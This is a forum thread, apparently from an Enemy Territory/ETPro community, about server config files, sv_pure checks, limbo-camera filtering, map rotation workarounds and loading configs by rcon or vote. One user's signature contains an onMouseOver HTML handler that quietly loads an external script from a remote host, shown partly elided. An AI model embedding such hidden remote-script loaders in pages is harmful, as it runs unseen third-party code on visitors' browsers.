yea what rain said

Code: Select all

command "pb_sv_enable" 
        command "pb_sv_kicklen 1"          
        command "pb_sv_cvarempty"          
        command "sv_cvarempty" 
Palbin-OGL
www.metamule.com
OGL Admin ET Campaign & SW Ladder / [url=irc://irc.gamesurge.net/ogl]#OGL[/url] / www.worldogl.com
bani
Site Admin

Post by bani »

the next release of etpro will have sanity checking on sv_pure in configs.

any config which has sv_pure in it, should make it the first cvar in the init{} block, e.g.

configname someleague
init
{
set sv_pure 1

this will prevent the config from going any further if the admin has sv_pure incorrectly set. you cannot change sv_pure on the fly without borking the server badly. what it will do is check that the config's sv_pure matches the server's current sv_pure setting and abort the config with a verbose warning if they don't match.
BOTA

Post by BOTA »

I'll adapt my configs in anticipation.
bani
Site Admin

Post by bani »

if leagues havent done this already, they should probably set g_filtercams 1 ...

it prevents players from the enemy team showing up in limbo cameras, so you can't use it to remotely watch the enemy spawns.
BOTA

Post by BOTA »

That is an important tip.
KingJackaL

Post by KingJackaL »

I don't get it - doesn't that automatically happen when you speclock the teams?
Rain

Post by Rain »

Doubt it! :?
[...]
Nope!
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
DG

Post by DG »

erm is it me or shouldnt tournament .configs have <i>command "set nextmap map_restart"</i> or something, to break map rotations?

also, if a .config has been loaded, and then /config "none", what settings remain of the previous config? Would I be right in assuming the "init" block settings would remain, although any "setl" would no lo longer be locked? I beleive the game "forgets" about the map blocks.
IdNotFound

Post by IdNotFound »

From personal experience, it keeps current variable values and becomes configless (no locked cvars, no map specific cvars, etc.).
Image nZ/IdNotFound
NaZGûL TeaM Leader
SAWL Tech Staff
DG

Post by DG »

yeah that'd make most sense.

bit confuzzled about map rotations continuing, I'd have thought that would be an frequently voiced issue by now?

cant test because the .config's dont seem to show up on non-dedicated server (maybe i just broke something elsewhere in it though).
Kendle

Post by Kendle »

In order to break the map rotation when switching between public and match mode, I used default_comp.cfg which contained:-

set nextmap ""
config clanwar
so I could do /ref comp to put it in match mode with no fear of the map rotation still being active.

But that's a workaround, it would, as you say, make more sense to put set nextmap "" (or whatever) in the config in the first place.
whys

Post by whys »

so if every client picks his own antilag method.... does this mean i can use etmain or no antilag system which will make me frame\warp? (they do, dont they?)
bani
Site Admin

Post by bani »

whys wrote:so if every client picks his own antilag method.... does this mean i can use etmain or no antilag system which will make me frame\warp? (they do, dont they?)
no, antilag doesn't affect your player's movement at all. it only affects your shots.
n3xt

Post by n3xt »

hi,

i want to aks how do i load a config don't know how it works
KingJackaL

Post by KingJackaL »

Via rcon, use the command:

config FILENAME
Via in-game vote, use:

/callvote config FILENAME
To see a list of available votable .config's (note that your .config must be added into the list in 'vote_allow_config' to be votable):

/callvote config
Note that you use the FILEname of the .config (minus the .config extension), not the 'configname' contained in the .config file. The 'configname' is a longer (possibly colored etc) descriptive name.